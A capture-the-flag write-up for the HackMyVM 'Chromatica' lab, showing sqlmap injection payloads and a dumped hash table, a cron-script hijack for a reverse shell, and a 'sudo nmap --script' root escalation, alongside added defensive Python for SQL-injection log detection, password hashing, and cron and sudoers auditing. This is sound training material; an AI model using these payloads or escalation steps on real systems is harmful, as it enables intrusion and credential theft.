
HackMyVM-chromatica

Introduction

  • Lab address: https://hackmyvm.eu/machines/machine.php?vm=Chromatica

[image]
Environment:

  • Attacker: kali 192.168.43.40
  • Target: VirtualBox VM 192.168.43.41

Getting started

The target shows its IP address as soon as it boots, so go straight to scanning ports with nmap.
[image]
Oh, this time there's a port 5353 as well.
A directory scan finds a robots.txt.
[image]
It reveals a new path:
[image]
Change the User-Agent header with HackBar and open that path directly.
Inside is a search box for looking up cities.
[image]
[image]
Search for anything first; there's a new path, /search.php, showing information about some cities.
[image]
Pick a city at random and search; it smells like SQL injection, so test by hand:
' closes the quote and throws an error; '--+ closes it and the page still responds normally, so straight on to sqlmap.
[image]
sqlmap pulls out the user records


sqlmap -u "http://192.168.43.41/dev-portal/search.php?city=" --user-agent="dev" -D Chromatica -T users -C id,username,password --dump --batch

        ___
       __H__
 ___ ___[']_____ ___ ___  {1.9.7.15#dev}
|_ -| . [)]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 04:21:39 /2026-06-16/

[04:21:40] [WARNING] provided value for parameter 'city' is empty. Please, always use only valid parameter values so sqlmap could be able to run properly
[04:21:40] [INFO] resuming back-end DBMS 'mysql'
[04:21:40] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: city (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: city=' AND (SELECT 8540 FROM (SELECT(SLEEP(5)))eZLl) AND 'ToUj'='ToUj

    Type: UNION query
    Title: Generic UNION query (NULL) - 4 columns
    Payload: city=' UNION ALL SELECT NULL,CONCAT(0x717a6b6a71,0x4c77764871705a7578446c49586a6d4c46584176586149514a59466465656b636d69556275686967,0x71707a7171),NULL,NULL-- -
---
[04:21:40] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 22.04 (jammy)
web application technology: Apache 2.4.52
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[04:21:40] [INFO] fetching entries of column(s) 'id,password,username' for table 'users' in database 'Chromatica'
[04:21:40] [INFO] recognized possible password hashes in column 'password'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] N
do you want to crack them via a dictionary-based attack? [Y/n/q] Y
[04:21:40] [INFO] using hash method 'md5_generic_passwd'
what dictionary do you want to use?
[1] default dictionary file '/usr/share/sqlmap/data/txt/wordlist.tx_' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> 1
[04:21:40] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] N
[04:21:40] [INFO] starting dictionary-based cracking (md5_generic_passwd)
[04:21:40] [INFO] starting 6 processes
[04:21:41] [INFO] cracked password 'keeptrying' for user 'user'
Database: Chromatica
Table: users
[5 entries]
+----+-----------+-----------------------------------------------+
| id | username  | password                                      |
+----+-----------+-----------------------------------------------+
| 1  | admin     | 8d06f5ae0a469178b28bbd34d1da6ef3              |
| 2  | dev       | 1ea6762d9b86b5676052d1ebd5f649d7              |
| 3  | user      | 3dd0f70a06e2900693fc4b684484ac85 (keeptrying) |
| 4  | dev-selim | f220c85e3ff19d043def2578888fb4e5              |
| 5  | intern    | aaf7fb4d4bffb8c8002978a9c9c6ddc9              |
+----+-----------+-----------------------------------------------+

[04:21:43] [INFO] table 'Chromatica.users' dumped to CSV file '/home/kali/.local/share/sqlmap/output/192.168.43.41/dump/Chromatica/users.csv'
[04:21:43] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/192.168.43.41'
[04:21:43] [WARNING] your sqlmap version is outdated

[*] ending @ 04:21:43 /2026-06-16/
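Seen from the defender's side, the two injection points sqlmap lists above leave distinctive traces in the web server's access log. The Python below is an added example, not part of the original writeup: it parses constructed Apache combined-format log lines (the client IPs, timestamps, sizes and the "dev" User-Agent are made up to resemble the session above) and flags any query parameter carrying the same payload shapes sqlmap used, namely a quote followed by AND/OR, SLEEP(), UNION ... SELECT, hex string literals and a comment tail.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample in Apache combined log format (not taken from the machine),
# modelled on the requests sqlmap reported above: the "dev" User-Agent, a
# time-based payload and a UNION payload against /dev-portal/search.php.
SAMPLE_LOG = """\
192.168.43.40 - - [16/Jun/2026:04:20:01 +0000] "GET /dev-portal/search.php?city=London HTTP/1.1" 200 812 "-" "dev"
192.168.43.40 - - [16/Jun/2026:04:21:40 +0000] "GET /dev-portal/search.php?city=%27%20AND%20%28SELECT%208540%20FROM%20%28SELECT%28SLEEP%285%29%29%29eZLl%29%20AND%20%27ToUj%27%3D%27ToUj HTTP/1.1" 200 611 "-" "dev"
192.168.43.40 - - [16/Jun/2026:04:21:41 +0000] "GET /dev-portal/search.php?city=%27%20UNION%20ALL%20SELECT%20NULL%2CCONCAT%280x717a6b6a71%2C0x4c7776%2C0x71707a7171%29%2CNULL%2CNULL--%20- HTTP/1.1" 200 734 "-" "dev"
10.0.0.7 - - [16/Jun/2026:04:25:00 +0000] "GET /dev-portal/search.php?city=Paris HTTP/1.1" 200 790 "-" "Mozilla/5.0"
"""

# One combined-format line: ip ident user [time] "method target proto" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Indicators matching the injection shapes sqlmap reported: quote-plus-boolean,
# comment tails, UNION SELECT, time-delay functions and long hex string literals.
SQLI_PATTERNS = {
    "quote_boolean": re.compile(r"'\s*(and|or)\s", re.I),
    "comment_tail": re.compile(r"--\s|#\s*$|/\*"),
    "union_select": re.compile(r"\bunion\b\s+(all\s+)?\bselect\b", re.I),
    "time_delay": re.compile(r"\b(sleep|benchmark)\s*\(", re.I),
    "hex_literal": re.compile(r"\b0x[0-9a-f]{6,}\b", re.I),
}


def scan_line(line):
    """Return (client_ip, [(param, [indicators])]) if a query parameter looks injected, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    query = urlsplit(m["target"]).query
    hits = []
    # parse_qsl percent-decodes each value, so the patterns run on what the app saw
    for name, value in parse_qsl(query, keep_blank_values=True):
        matched = [k for k, p in SQLI_PATTERNS.items() if p.search(value)]
        if matched:
            hits.append((name, matched))
    return (m["ip"], hits) if hits else None


def scan_log(text):
    """Scan every line of a log and collect the suspicious ones."""
    findings = []
    for line in text.splitlines():
        hit = scan_line(line)
        if hit:
            findings.append(hit)
    return findings


if __name__ == "__main__":
    for ip, hits in scan_log(SAMPLE_LOG):
        for param, indicators in hits:
            print(f"{ip}: parameter '{param}' matched {', '.join(indicators)}")
```

To run it on a real log, pass the file contents to scan_log(). The patterns are triage indicators rather than proof, and the actual fix lives on the server side: search.php has to bind city as a parameter of a prepared statement instead of concatenating it into the query, which no amount of log scanning replaces.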

Here it should just be a matter of brute-forcing the MD5 hashes.
The picture below is from the page source; it talks about colouring something, which might mean rainbow tables. That's a wild guess on my part, but it may be a hint.
[image]
I first tried hashcat on kali with the rockyou wordlist, but it didn't crack them.
An online MD5 lookup had results but charges for them, damn it, and not cheaply either! Forget it, I'll just go and find the cracked results in someone else's writeup.......

admin:adm!n
dev:flaghere
user:keeptrying
dev-selim:
intern:intern00
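The reason these passwords fall to a dictionary at all is that the users table stores bare MD5 digests: no salt and no work factor, so sqlmap's md5_generic_passwd cracker only has to hash each wordlist entry once and compare, and a precomputed table works just as well. The Python below is an added example, not code from the machine or from this writeup; it contrasts that storage with a salted, iterated PBKDF2-HMAC-SHA256 hash. The stored-string format and the 600,000 iteration count are my choices, not something the page specifies.

```python
import hashlib
import hmac
import os

# PBKDF2-HMAC-SHA256 work factor; chosen for this example, matching current OWASP guidance
ITERATIONS = 600_000


def md5_unsalted(password):
    """What the dumped users table stores: plain MD5 of the password, no salt, no work factor."""
    return hashlib.md5(password.encode("utf-8")).hexdigest()


def hash_password(password, salt=None, iterations=ITERATIONS):
    """Return a self-describing string: algorithm$iterations$salt_hex$digest_hex."""
    salt = salt if salt is not None else os.urandom(16)  # fresh random salt per user
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${digest.hex()}"


def verify_password(password, stored):
    """Recompute with the stored salt and iteration count; compare in constant time."""
    algo, iterations, salt_hex, digest_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        raise ValueError("unsupported hash format")
    digest = hashlib.pbkdf2_hmac(
        "sha256", password.encode("utf-8"), bytes.fromhex(salt_hex), int(iterations)
    )
    return hmac.compare_digest(digest, bytes.fromhex(digest_hex))


def same_password_same_hash(password, hasher):
    """True if two accounts with the same password end up with identical stored values."""
    return hasher(password) == hasher(password)


if __name__ == "__main__":
    # Two users choosing the same password, stored both ways
    print("unsalted MD5 collides across users:", same_password_same_hash("keeptrying", md5_unsalted))
    print("salted PBKDF2 collides across users:", same_password_same_hash("keeptrying", hash_password))
    stored = hash_password("keeptrying")
    print(stored)
    print("verify correct:", verify_password("keeptrying", stored))
    print("verify wrong:", verify_password("keeptrying1", stored))
```

With the salted scheme two users who both chose keeptrying get different stored values, so a precomputed table (the colouring hint above, if it really does mean rainbow tables) buys nothing, and every guess costs 600,000 HMAC evaluations instead of a single MD5.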

Only the dev user can log in here, but it returns some content and then drops the connection immediately.
The flag it returns is fake as well; it won't submit.
[image]
I was out of ideas here; only after reading a veteran's writeup did I learn that to keep the SSH session from closing you shrink the window until it can't print all the characters at once. Learned something.
After shrinking the window, type !bash and you have dev's shell.
[image]
Then grab the flag and submit it.
[image]

Privilege escalation

sudo -l can't be run; the dev user isn't allowed to use sudo.
There's a bye.sh; opening it shows that it can run the more command.

[image]
Looked up more on GTFOBins, but it can't be used for escalation.
Hmm..... look for something else.


There's one more user under /home; take a look at the scheduled jobs.
The user analyst runs an sh file with /bin/bash every minute.


dev@Chromatica:~$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
# You can also override PATH, but by default, newer versions inherit it from the environment
#PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# Example of job definition:
# .---------------- minute (0 - 59)
# |  .------------- hour (0 - 23)
# |  |  .---------- day of month (1 - 31)
# |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...
# |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# |  |  |  |  |
# *  *  *  *  * user-name command to be executed
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
* *     * * *   analyst /bin/bash /opt/scripts/end_of_day.sh
#

Checking our user's permissions on that sh file: it's readable and writable.
So just write a reverse shell command into it.
[image]
Start a listener and wait for the shell to come back. There's a flag here as well, but it can't be submitted; ignore it for now.
[image]
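The cron entry is the actual weakness: a job that runs every minute as analyst from a script file that a different user can edit. The Python below is an added check for that condition, not part of the writeup; the audit_crontab function, the script-path regex and the throwaway directory built by demo() are my constructions. It parses the /etc/crontab shown above, locates each script file the jobs execute and reports any that are group- or world-writable, or that sit in a directory others can write to (which lets the file be replaced even if the file itself is read-only).

```python
import os
import re
import stat
import tempfile

# The active job lines from the /etc/crontab shown above (comments omitted)
CRONTAB = """\
SHELL=/bin/sh
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
* *     * * *   analyst /bin/bash /opt/scripts/end_of_day.sh
"""

# Absolute paths ending in a common script extension anywhere in the command string
SCRIPT_RE = re.compile(r"(?<!\S)(/\S+\.(?:sh|py|pl|rb))\b")


def parse_system_crontab(text):
    """Parse /etc/crontab-style lines (five time fields, a user, a command) into job dicts."""
    jobs = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue  # blank line, comment, or VAR=value assignment
        parts = line.split(None, 6)
        if len(parts) < 7:
            continue
        jobs.append({"schedule": " ".join(parts[:5]), "user": parts[5], "command": parts[6]})
    return jobs


def writable_by_others(path):
    """List the permission problems that let a non-owner change what cron will run."""
    mode = os.stat(path).st_mode
    problems = []
    if mode & stat.S_IWGRP:
        problems.append("group-writable")
    if mode & stat.S_IWOTH:
        problems.append("world-writable")
    parent_mode = os.stat(os.path.dirname(path)).st_mode
    if parent_mode & (stat.S_IWGRP | stat.S_IWOTH) and not parent_mode & stat.S_ISVTX:
        problems.append("parent-dir-writable")  # file can be swapped out wholesale
    return problems


def audit_crontab(text, root="/"):
    """Flag every job whose script file could be modified by someone other than its owner.

    root lets the check run against a staged directory tree instead of the live filesystem.
    """
    findings = []
    for job in parse_system_crontab(text):
        for script in SCRIPT_RE.findall(job["command"]):
            real = os.path.join(root, script.lstrip("/"))
            if not os.path.isfile(real):
                continue
            problems = writable_by_others(real)
            if problems:
                findings.append({"user": job["user"], "script": script, "problems": problems})
    return findings


def demo():
    """Stage the page's script path in a temp root, world-writable as on the machine, and audit it."""
    root = tempfile.mkdtemp()
    script_dir = os.path.join(root, "opt", "scripts")
    os.makedirs(script_dir)
    os.chmod(script_dir, 0o755)  # directory itself is fine; only the file is the problem
    script = os.path.join(script_dir, "end_of_day.sh")
    with open(script, "w") as fh:
        fh.write("#!/bin/bash\necho 'end of day'\n")  # constructed stand-in for the real script
    os.chmod(script, 0o666)  # the weakness the writeup exploits: anyone can edit it
    return audit_crontab(CRONTAB, root=root)


if __name__ == "__main__":
    for f in demo():
        print(f"cron user {f['user']} runs {f['script']}: {', '.join(f['problems'])}")
```

To audit a live system, call audit_crontab(open("/etc/crontab").read()) and repeat for each file in /etc/cron.d. Fixing the finding here means making /opt/scripts/end_of_day.sh writable only by its owner (root or analyst, not dev) and keeping /opt/scripts itself non-writable for everyone else.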
Then on to getting root. sudo -l again, and this time nmap is allowed. Straight to GTFOBins, but it doesn't work??????

[image]
Later, searching in the browser, I found another version of the GTFOBins nmap entry with an escalation method in it, as in the picture:
(a) works
(b) has a version restriction
I have no idea why the official GTFOBins nmap page doesn't list method (a).
[image]

Following those commands, root is obtained straight away.

analyst@Chromatica:~$ TF=$(mktemp)
TF=$(mktemp)
analyst@Chromatica:~$ echo 'os.execute("/bin/sh")'>$TF
echo 'os.execute("/bin/sh")'>$TF
analyst@Chromatica:~$ sudo nmap --script=$TF
sudo nmap --script=$TF
Starting Nmap 7.80 ( https://nmap.org ) at 2026-06-16 11:16 UTC
NSE: Warning: Loading '/tmp/tmp.j9TlFepk4l' -- the recommended file extension is '.nse'.
# is
/bin/sh: 1: is: not found
# id
uid=0(root) gid=0(root) groups=0(root)
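Root here comes from a sudo rule that lets analyst run nmap, a binary whose --script option loads arbitrary Lua, so the rule is equivalent to handing out a root shell; the more in bye.sh is the same kind of thing one level down. The Python below is an added example, not the machine's sudoers or code from any writeup: it parses a constructed sudoers snippet (the analyst line mirrors the rule sudo -l revealed, the other lines are invented for the demo) and flags non-root rules that grant a binary on a short list of known shell escapes, noting whether NOPASSWD is set.

```python
import os
import re

# Binaries from this writeup whose normal features hand out a shell when run under sudo
SHELL_ESCAPES = {
    "nmap": "--script runs caller-supplied Lua (os.execute)",
    "more": "'!' at the pager prompt runs a shell command",
}

KNOWN_TAGS = {"NOPASSWD", "PASSWD", "NOEXEC", "EXEC", "SETENV", "NOSETENV",
              "LOG_INPUT", "NOLOG_INPUT", "LOG_OUTPUT", "NOLOG_OUTPUT"}

# Constructed sudoers content, not the machine's real file
SAMPLE_SUDOERS = """\
Defaults        env_reset
Defaults        secure_path="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
root    ALL=(ALL:ALL) ALL
%sudo   ALL=(ALL:ALL) ALL
analyst ALL=(root) NOPASSWD: /usr/bin/nmap
dev     ALL=(root) NOPASSWD: /usr/bin/more /var/log/syslog
backup  ALL=(root) /usr/bin/rsync
"""

# who  host = (runas) spec
RULE_RE = re.compile(
    r"^(?P<who>[^\s#]+)\s+(?P<host>[^=\s]+)\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?(?P<spec>.+?)\s*$"
)


def split_tags(cmd):
    """Peel leading tags such as NOPASSWD: off a command spec; return (tags, command)."""
    tags = []
    while True:
        m = re.match(r"^([A-Z_]+):\s*", cmd)
        if not m or m.group(1) not in KNOWN_TAGS:
            return tags, cmd
        tags.append(m.group(1))
        cmd = cmd[m.end():]


def parse_sudoers(text):
    """Yield (who, runas, tags, command) for each plain user specification line."""
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith("Defaults") or line.split()[0].endswith("_Alias"):
            continue  # aliases and Defaults are out of scope for this quick check
        m = RULE_RE.match(line)
        if not m:
            continue
        runas = m["runas"] or "root"
        # commas separate command entries; commands with commas in arguments are not handled
        for cmd in m["spec"].split(","):
            tags, cmd = split_tags(cmd.strip())
            yield m["who"], runas, tags, cmd


def audit_sudoers(text):
    """Flag rules granting a non-root principal a binary with a known shell escape."""
    findings = []
    for who, runas, tags, cmd in parse_sudoers(text):
        if who == "root" or cmd == "ALL":
            continue  # full sudo for admins is a policy question, not a misconfiguration here
        binary = os.path.basename(cmd.split()[0])
        if binary in SHELL_ESCAPES:
            findings.append({
                "user": who, "runas": runas, "command": cmd, "binary": binary,
                "nopasswd": "NOPASSWD" in tags, "why": SHELL_ESCAPES[binary],
            })
    return findings


if __name__ == "__main__":
    for f in audit_sudoers(SAMPLE_SUDOERS):
        pw = "without a password" if f["nopasswd"] else "with a password"
        print(f"{f['user']} may run '{f['command']}' as {f['runas']} {pw}: {f['why']}")
```

The dev rule shows why restricting the argument list is not enough: more opened on a fixed file still accepts the ! escape. The parser covers plain user specifications only, which is sufficient for a quick review of /etc/sudoers and /etc/sudoers.d; the list of risky binaries is deliberately limited to the two this machine used and should be extended from GTFOBins for real use.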

Grab the flag, done.
[image]

Only after finishing did I notice that port 5353 apparently wasn't needed at all........

http://www.rkmt.cn/news/1537409.html
